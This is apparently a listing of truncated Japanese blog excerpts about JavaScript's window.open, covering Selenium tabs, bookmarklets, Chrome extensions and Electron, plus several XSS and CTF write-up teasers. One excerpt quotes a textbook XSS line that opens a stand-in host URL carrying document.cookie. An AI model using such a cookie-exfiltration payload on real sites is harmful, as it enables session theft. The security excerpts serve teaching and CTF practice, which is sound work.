今回はPython、Seleniumで新しいタブを開く方法の説明になります。 新タブはjavascriptの実行によりwindow.openを使用することで開くことができます。 もう1つ、driver.switch_to.new_window("tab")使用による方法もありますが、それは以下の記事などで用例中に記載しています。 kuku81kuku81.hatenablog.com (adsbygoogle = window.adsbygoogle || []).push({}); 目次 1.Chromeの場合 2.Edgeの場合 3.空のタブを開くには 1.Chromeの場合 具体的には、…
こんにちは、たびとです。 ポップアップした画面に表示した画像のサムネイルをクリックすると、 オリジナルの画像をポップアップするような動作をしたいのですが、 ポップアップする元の画面のタブに表示されてしまう現象が起きました。
はじめに 豊洲ユナイテッドシネマ埋めるぞ!(ミリアニはいいぞ) nikkieです。 今回は小さな素振り記事です。 目次 はじめに 目次 window.open 開発ツールで動作確認 openする先のWireMockを用意 XSS脆弱性のあるDjangoアプリにopenを埋め込む 終わりに window.open 『実践Django』のXSS脆弱性の例で知りました。 openを使ってクッキーを送信するコードが実行される例が紹介されます(Kindle版 p.297 より)。 <script>open('http://example.com/stole?cookie='+escape(documen…
ソース: manasharsh.medium.com 脆弱性:XSS、postMessage 訳: XSS を見つけるのが大好きな人の多くは、かつては可能性があったにもかかわらず、通常、PostMessage XSS を見逃していて。 そこで、簡単なリソースを探している人に役立つかもしれないこのトピックをここで取り上げることにして。 まず、PostMessage がどのように機能するかを理解しましょ。 によると Mozilla :- window.postMessage() メソッドは、Window オブジェクト間のクロスオリジン通信を安全に有効にします。 たとえば、ページとそれが生成したポッ…
新しいウィンドウで開くことについてのメモ。 Vue.jsはシングルページアプリケーション(SPA)の開発に適したフレームワークですが、時には従来通りの方法で新しいブラウザウィンドウやタブを開く必要もあります。 この記事はVueやVanilla JavaScriptで新しいウィンドウを開く方法と、その際の注意点のメモです。 どんなときに必要? 使えるシーン 印刷用ページ: 新しいウィンドウに専用のレイアウトを持つページを開いて、印刷を簡単に行うとき。 外部リンク: セキュリティ上の理由から、外部サイトへのリンクは新しいタブやウィンドウで開かないといけないとき。 マルチタスク操作: ユーザーが複数…
">2024.04.13更新 ">TVerをポップアップから手軽に検索できるchrome拡張機能を作っています。 chromewebstore.google.com 機能 ・時計 ・TVer各種リンク ・TVer検索バー ・NHKプラスリンク ・ABEMAリンク ・ABEMA検索バー ・TVer用ブックマークレット ボタンをブックマークバーにドラッグしてepisodes(番組)とliveのページで使うと 番組名、エピソード名、局名、放送日、期間、URLを取得する。 ブックマークレット TVer_Copy 押すとクリップボードにコピーされる。 javascript:(function(){con…
ストリートビューの仕様はどのボタンを押してマップに戻っても、一体どの場所を見ていたか分からないものになってます。下記のブックマークレットを使うとストリートビューを見ているタブを残したまま新しいタブでマップを表示することができます。 ブックマークレットはブラウザに関係なく使用できます。 ブックマークレットの使い方 ブックマークバーを表示していない場合はバーを表示する。 設定→ブックマーク→ブックマークバーを表示。 ブックマークレットを作成する。 1-A コードをトリプルクリックでコピーし、バーを右クリック、「ページを追加」からURLにコードを張り付けて名前を付け保存する。 1-B コードをトリプ…
はじめに 今回はUnity公式パッケージであるBuild Report Inspectorについて紹介したいと思います。docs.unity3d.com 利用している様子 はじめに 概要 インストール方法 使い方 Build Report Inspectorの見方 Build Steps Source assets Output files Stripping Scenes using Assets 概要 Build Report InspectorはBuildPipeline.BuildPlayerにて取得できるBuild Reportに記載されている情報(publicなAPIで取得できない…
ソース: mouhannadalhmedi.medium.com 脆弱性:XSS, CORS 訳: 周知のとおり、最新の Web アプリケーション、特にSPA を備えた Web アプリケーションは、クライアント側のアプリケーションに大きく依存しています。 分析、支払い処理、認証、チャット サービスなどのコミュニケーション ツールなど、多数のサードパーティ サービスを備えていないクライアント側アプリケーションを見つけることはほとんどありません。 クロスオリジン通信 が付属しています。 ほとんどの場合、これらのサービスはサードパーティプロバイダーでホストされているため、異なる「オリジン 」 たとえ…
初めまして、2023年11月にInsight Edgeにジョインしたデータサイエンティストのヒメネス(Jiménez)です!スペイン出身です。 入社から数ヶ月しか経っていませんが、この短い期間の中で生成AIの案件に携わるうえ、海外案件でDSコンサルタントとしても活動しています。 元々数学者ですが、プログラミングが大好きで、得意とするアルゴリズム構築を仕事にしました。コンサルティング企業にもしばらく参画した結果、ビジネスも少しずつ理解できるようになり、自分の視野や能力が広がりました。 この機会にWeb scrapingについて紹介したいと思います。Web scraping(スクレイピング)は、W…
今回はPython、Seleniumで新しいタブを開く方法の説明になります。 新タブはjavascriptの実行によりwindow.openを使用することで開くことができます。 尚、Seleniumのバージョンアップでウェブドライバーの設定方法が変わったこともあり、以下の例はSelenium Ver.4.6以降の場合の例として記載しています。 Ver.4.6以前の場合については以下の過去記事などで載せています。 違いはドライバーの設定方法だけですが。 kuku81kuku81.hatenablog.com (adsbygoogle = window.adsbygoogle || []).pus…
https://ctftime.org/event/2102 web/terms-and-conditions web/flaglang web/la housing portal web/new-housing-portal web/pogn web/jason-web-token web/ctf-wiki 状況把握 cookieを保持しながらXSSを達成する cookie有りの状態でPOST /flagする POST /flagの結果を取り出してくる 最終payload web/terms-and-conditions ソースコード無し。 規約が出てくるので是非同意したいのだが「I Acc…
はじめに chrome拡張機能の設定ファイルの作成 JavaScriptファイルの実装 動作確認 審査・公開 はじめに 皆さんはanimetickというサイトをご存知でしょうか? 非常に便利で有用なサービスなので、毎クールアニメを複数視聴する方はぜひ使ってみてほしいのですが、 簡単に言うと「アニメの視聴状況をチケットで管理できるサービス」です。 ↑こんな感じで、視聴できるテレビ局と視聴中の作品を登録すると、放送日の前日にそのアニメの放送話数の「チケット」が未視聴リストに割り当てられます。 どのテレビ局で何時からどの作品の何話が放送されるかが一目でわかりますね。 該当話数の視聴が終わったら、その…
古の、jsでwindowopen。 なぜかpugです。 a(href='javascript:window.open("https://000690273.codepen.website/","HTML SKETCHES","width=1280,height=720,menubar=0,toolbar=0,locationbar=0")') open!!!!!
あけましておめでとうございます。1/21から1/22にかけてASISが開催していたMapna CTF 2024に、BunkyoWesternsとして参加した。結果は1位で嬉しい。 Web問は6問が出題されていたけれども、うち4問は私が取り掛かる前にSatokiさんがすでに解いていたし、1問は競技時間内に解ききれなかったしで、個人としてはPurifyという1問のみを解いた。 [Web 398] Purify (4 solves) [Web 398] Purify (4 solves) I think I downloaded the wrong DOMPurify. Website: (URL …
chromeのアドレスバーなしでキャプチャしたかったのだが window.openでもアドレスバーはセキュリティの問題で消すことができない。 そこでElectronを使うことにした。 インストール https://qiita.com/umamichi/items/6ce4f46c1458e89c4cfc コマンドラインでmain.jsを実行 Electron ./main.js main.js const electron = require('electron'); const app = electron.app; const BrowserWindow = electron.Browse…
12/23 - 12/24という日程で、オンサイト形式@浅草橋で開催された。12/23の11時開始で12/24の17時終了ということで30時間の競技だった。昨年度大会に引き続きkeymoonさんとのふたりチームであるCyberMidori*1*2で参加し、準優勝した🥈 順位は終始なかなかいい感じに推移しており*3、また最終的に2位でフィニッシュできたのは嬉しいものの、チーム:( *4に連覇を阻まれてしまったというのもあり悔しい気持ちもある。2, 3問は解かなければ勝てない点差をつけられていたので完敗だ。今回も問題のクオリティが(難易度も)高く、とても楽しめたのでよし。 リンク: 問題リポジトリ…
あるwebアプリを作りたくて、久々にJavaScriptのリハビリ。 親ウィンドウから子ウィンドウを開いたり、子ウィンドウの関数を実行したり、他のウィンドウに隠れた子ウィンドウを前面に出したり、閉じたりを試してみた。 全コード 子ウィンドウを開く 子ウィンドウの存在チェック 子ウィンドウの関数を実行する 子ウィンドウを前面に呼び戻す 子ウィンドウを閉じる 全コード 親ウィンドウのHTML(test_window-01.html) <html> <head> <meta charset="UTF-8"> <title>親ウィンドウからサブウィンドウの関数を呼び出す</title> <script…